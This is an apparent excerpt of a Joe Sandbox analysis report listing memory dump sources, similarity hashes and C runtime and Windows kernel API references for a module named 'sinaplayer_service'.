                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 508512864-0
                                                                                                                                                                                                    • Opcode ID: d0212448698406f956a895f9bfeae6de57b1d50abaf86fbcc3e6df5cb2bb2f33
                                                                                                                                                                                                    • Instruction ID: 3edbb5d2e8c2141a4a033026fe07fbf86053cfc625f740a5b9eb9c68133e8284
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0212448698406f956a895f9bfeae6de57b1d50abaf86fbcc3e6df5cb2bb2f33
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C41F574B1CB0A9BFB08CFAAC8807BE77E5EF45750B14852DE855C7644E771D9408B41
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCMT ref: 6D0F29E4
                                                                                                                                                                                                      • Part of subcall function 6D0F3D4A: InterlockedPopEntrySList.KERNEL32(?,?,6D0F29E9,00000000,?), ref: 6D0F3D54
                                                                                                                                                                                                      • Part of subcall function 6D0F3D4A: ??2@YAPAXI@Z.MSVCR120(00000010,?,6D0F29E9,00000000,?), ref: 6D0F3D69
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000), ref: 6D0F2AF6
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CEE8,00000000), ref: 6D0F2B0B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@Base::ChoreConcurrency::details::EntryExceptionInterlockedListRealizedSchedulerThrowstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2878774513-0
                                                                                                                                                                                                    • Opcode ID: cee49b9cf68528763f3de2b8b147f91e49f7ebceede46977f046c5c9cb1d2c82
                                                                                                                                                                                                    • Instruction ID: 5544a5618248aab96dcfe8d6c4a73cd6d624c5d18faa11ae67f717123edc63da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee49b9cf68528763f3de2b8b147f91e49f7ebceede46977f046c5c9cb1d2c82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB41AC31A04202AFEB25DF75C854BEABBB4FF45314F258169DD1A8B252D730D946CF90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EF944
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EF9AB
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EF9B5
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000000,6D15CEE8,00000000,?,6D0D351F,00000000,00000000,6D15CEE8), ref: 6D0EFA1C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,Function_000DCFD8,00000000,6D15CEE8,00000000), ref: 6D0EFA31
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D15CEE8,6D15CEE8,?,?,Function_000DCFD8,00000000,6D15CEE8,00000000), ref: 6D0EFA40
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency@@Manager@1@Resource$??0exception@std@@ExceptionH_prolog3Throwstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1103279269-0
                                                                                                                                                                                                    • Opcode ID: 72451103fd6d90560bff84c3269cf3b99830e68deffa6756a1666ee7b78fdd72
                                                                                                                                                                                                    • Instruction ID: e44ee49d5cc7f9c8ad3a40b686bd89f1b3b419d7a0ced2fc2e4ca11b8bfec1e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72451103fd6d90560bff84c3269cf3b99830e68deffa6756a1666ee7b78fdd72
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB315971D04115AFEB00CFAAE8806BEBFF8EFC6384B15806AD994E7201D731D942CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,00000000,00000070,?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?), ref: 6D0EADB1
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?,-00000004,?,6D0EDEB3), ref: 6D0EADC6
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004), ref: 6D0EADCD
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,6D0D1E37,00000000,?,00000000,?,?,-00000004,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004), ref: 6D0EADFC
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6D0EAE11
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: 6df72268960ccad1b80b88282353971f00fe4a91772488723b02d53acab7dee3
                                                                                                                                                                                                    • Instruction ID: f740fe24f2aeb22b7759c42c4459b165f9845ada4bda7bdc54310f0158516adc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6df72268960ccad1b80b88282353971f00fe4a91772488723b02d53acab7dee3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F316B31205611EFEB19DF19C980EAAB3F9FF8E351720855DE95A8B611DB30F941CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,00000000,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FAD53
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FAD6A
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FAD71
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,?,6D0FAB93,?,?,?), ref: 6D0FADA0
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6D0FADB5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: 24761d94acf23b920419705c1d5b6c69c6edf66b6db30a06c5f57ec5a07dbd90
                                                                                                                                                                                                    • Instruction ID: b62a31ddf012a7579c8055b61261377d3719e8c1c6073db5ebdfde8b9eb802ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24761d94acf23b920419705c1d5b6c69c6edf66b6db30a06c5f57ec5a07dbd90
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7318C31605615AFEB15DF19C980EAAB3F5FF89321B30855DE95B8B601DB30F942CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32 ref: 6D0F639C
                                                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(?,?), ref: 6D0F63B3
                                                                                                                                                                                                    • QueryDepthSList.KERNEL32(?), ref: 6D0F63BA
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?), ref: 6D0F63E9
                                                                                                                                                                                                    • Concurrency::details::SafePointInvocation::InvokeAtNextSafePoint.LIBCMT ref: 6D0F63FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$DepthInterlockedPointQuerySafe$Concurrency::details::EntryFlushInvocation::InvokeNextPush
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1206056122-0
                                                                                                                                                                                                    • Opcode ID: d0796892af8802650c00b57e30d32ff55555657f6d70f05d5d6d33f17602e571
                                                                                                                                                                                                    • Instruction ID: c777b1bb669dd4d93b38098faaa47118dc0fa26721d9f18f377466b23c85341b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d0796892af8802650c00b57e30d32ff55555657f6d70f05d5d6d33f17602e571
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A331A431101611AFE716DF19CA80FAA73F5FF8A310764851DED568B601CB31F942CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F3BD0
                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3BF1
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(?,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C14
                                                                                                                                                                                                    • __crtGetTickCount64.MSVCR120(00000018,6D0ED71D,00000001,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C40
                                                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(?,00000018,6D0ED71D,00000001,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C58
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,?,?,6D0D3091,00000000,00000000), ref: 6D0F3C7C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Count64EntryInterlockedListTick__crt$??2@H_prolog3_catch
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1274909586-0
                                                                                                                                                                                                    • Opcode ID: a6584919152e431f328194b259527fa7e817d6dfb696fc077db07733ce8664d6
                                                                                                                                                                                                    • Instruction ID: e264176fe88cac77caef442f28e19bf3547516335c2d636fa9d64670bd7f6d42
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6584919152e431f328194b259527fa7e817d6dfb696fc077db07733ce8664d6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7331E071A056129FEB0ACF74C444BADBBF1BF49724F258629D965CB241DB30DA06CBC2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D40FA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4104
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4110
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D411A
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4142
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6D0B0D31,?,?,?,?,00000000), ref: 6D0D4149
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2819658684-0
                                                                                                                                                                                                    • Opcode ID: c2757aba9618cebd934d0aa37c1abdb19a80ef9c5ce30a57f709cfeef8e815d8
                                                                                                                                                                                                    • Instruction ID: 62c6a0b42a988f235bb3fd5592c2503bdd14a26f2a3b493ad03244908ecd2779
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2757aba9618cebd934d0aa37c1abdb19a80ef9c5ce30a57f709cfeef8e815d8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B31D53864C3479FF7028F29D89178F7BA5AF6A350F108116F9118B281D771D852C7A2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: 5e11eba46e6ddeb57dcd9311bf8b200ca86bbb9609fbf9110a0d3a375050a6f6
                                                                                                                                                                                                    • Instruction ID: 8f16f5529a483c2093d689d34168b6f83bd586875e0d4e24ee1b2df57c77ee94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e11eba46e6ddeb57dcd9311bf8b200ca86bbb9609fbf9110a0d3a375050a6f6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621AE3121430BDAFB12DE79C890BBE77A4BF15724B91522AE9248F2A0E771845197D1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D10B95C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D10B966
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _ismbblead_l.MSVCR120(?,?,?), ref: 6D10B98A
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10B9A9
                                                                                                                                                                                                    • _errno.MSVCR120(?), ref: 6D10B9BF
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?), ref: 6D10B9C9
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$_getptd_invalid_parameter_ismbblead_l
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A3C0B: __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                      • Part of subcall function 6D0FA549: CreateThread.KERNEL32(00000000,00010000,00000000,00000000,?,6D0F22EF), ref: 6D0FA55C
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 6D0F9A0D
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0F9A1B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?), ref: 6D0F9A3D
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D0F9A58,?), ref: 6D0F9A52
                                                                                                                                                                                                    • Concurrency::details::ThreadProxy::~ThreadProxy.LIBCMT ref: 6D0F9A6E
                                                                                                                                                                                                    • free.MSVCR120(?,00000002,006D0E92,?,6D0F9A58,?), ref: 6D0F9A7A
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$Create$CloseConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorEventExceptionHandleLastProxyProxy::~Throw__crtfree
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120 ref: 6D0F9FC2
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR120 ref: 6D0FA012
                                                                                                                                                                                                    • CreateTimerQueueTimer.KERNEL32(?,00000000,6D0F9F7B,?,?,00000000,00000020), ref: 6D0FA026
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,?,?), ref: 6D0FA043
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0FA075
                                                                                                                                                                                                      • Part of subcall function 6D0A6FED: ___crtSetThreadpoolTimer.LIBCMT ref: 6D0A7032
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0AD1CC,6D0AC7FC,00000000,00000001,?,?), ref: 6D0FA08C
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Timer$Concurrency@@Version@std::exception::exception$CreateExceptionH_prolog3Manager@1@QueueQueue@details@ResourceSharedThreadpoolThrow___crt
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4382
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4392
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A4399
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43C3
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43D8
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(00000180,?,?,00000180,00000000,6D0A4A97), ref: 6D0A43DE
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: HeadInitializeList$??2@mallocmemset
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A4443
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,?,00000000), ref: 6D0A4453
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,?,00000000), ref: 6D0A445A
                                                                                                                                                                                                      • Part of subcall function 6D08EE11: malloc.MSVCR120(?), ref: 6D08EE1A
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4484
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A4499
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,?,?,00000180,00000000,6D0A4AC1), ref: 6D0A449F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
